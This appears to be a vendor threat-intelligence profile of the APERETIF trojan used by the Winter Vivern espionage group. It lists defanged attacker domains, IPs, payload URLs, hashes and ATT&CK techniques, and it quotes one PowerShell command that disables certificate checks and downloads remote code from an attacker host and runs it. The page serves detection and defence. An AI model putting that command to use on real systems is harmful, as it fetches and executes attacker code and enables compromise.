Skip to main content
Mallory
MalwareUsed by 1 actor

APERETIF

APERETIF is a trojan malware family associated with the UAC-0114 / Winter Vivern espionage group. CERT-UA named the malware based on a development PDB path found in a sample. Reported APERETIF samples were PE32 executables written in Visual C++ with a compilation timestamp of May 2021. The malware automates collection of victim details, maintains access on compromised systems, and beacons to attacker-controlled infrastructure, including marakanas[.]com. Observed behavior includes use of PowerShell with whoami to beacon outbound and retrieve further instructions or downloads, including use of the HTTPS GET URI signatures.php?id=1. APERETIF was used in campaigns targeting government entities and related organizations, with Winter Vivern activity reported against government organizations in Ukraine, Poland, Lithuania, India, the Vatican, Slovakia, and Italy, as well as at least some private telecommunications organizations supporting Ukraine. Delivery tradecraft linked to the actor included phishing websites impersonating official government resources, malicious documents, fake virus-scan lures, and batch scripts disguised as virus scanners that triggered malware downloads from attacker-controlled servers. Compromised WordPress sites including applesaltbeauty[.]com and natply[.]com were used to host APERETIF payloads. The activity has been assessed as aligned with Russian and Belarusian interests, and one report notes APERETIF contains a code line described as typical of Russia-affiliated adversary behavior patterns. Known related infrastructure mentioned in the reporting includes marakanas[.]com, bugiplaysec[.]com, ocs-romastassec[.]com, ocspdep[.]com, security-ocsp[.]com, and troadsecow[.]com; associated IPs include 176.97.66[.]57, 179.43.187[.]175, 179.43.187[.]207, 195.54.170[.]26, and 80.79.124[.]135. Reported associated SHA1 hashes include f39b260a9209013d9559173f12fbc2bd5332c52a and a19d46251636fb46a013c7b52361b7340126ab27.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Winter Vivern

One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample... APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.

via sentinelone labssentinelone.com
MITRE ATT&CK

Techniques & procedures

8 distinct techniques documented for this family, organized by ATT&CK tactic.

T1584Compromise InfrastructureEvidence1

The group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages.

Initial Access

1 technique
T1566.001Spearphishing AttachmentEvidence1

In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.

Execution

3 techniques
T1059Command and Scripting InterpreterEvidence1
TacticExecution

When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools.

T1059.001PowerShellEvidence1
TacticExecution

powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"

T1204.002Malicious FileEvidence1
TacticExecution

These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders. | Recent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.

Discovery

1 technique
T1033System Owner/User DiscoveryEvidence1
TacticDiscovery

As with the previous script, the trojan makes use of whomami within PowerShell in its initial activity to beacon outbound for further instructions and/or downloads.

T1071.001Web ProtocolsEvidence1

APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.

T1105Ingress Tool TransferEvidence1

utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
8 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
2 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
4 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app2 years ago
hash.sha1●●●●●●●●●●●●View more in app3 years ago
hash.sha1●●●●●●●●●●●●View more in app3 years ago
domain●●●●●●●●●●●●View more in app3 years ago
ip.v4●●●●●●●●●●●●View more in app3 years ago
ip.v4●●●●●●●●●●●●View more in app3 years ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping8

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.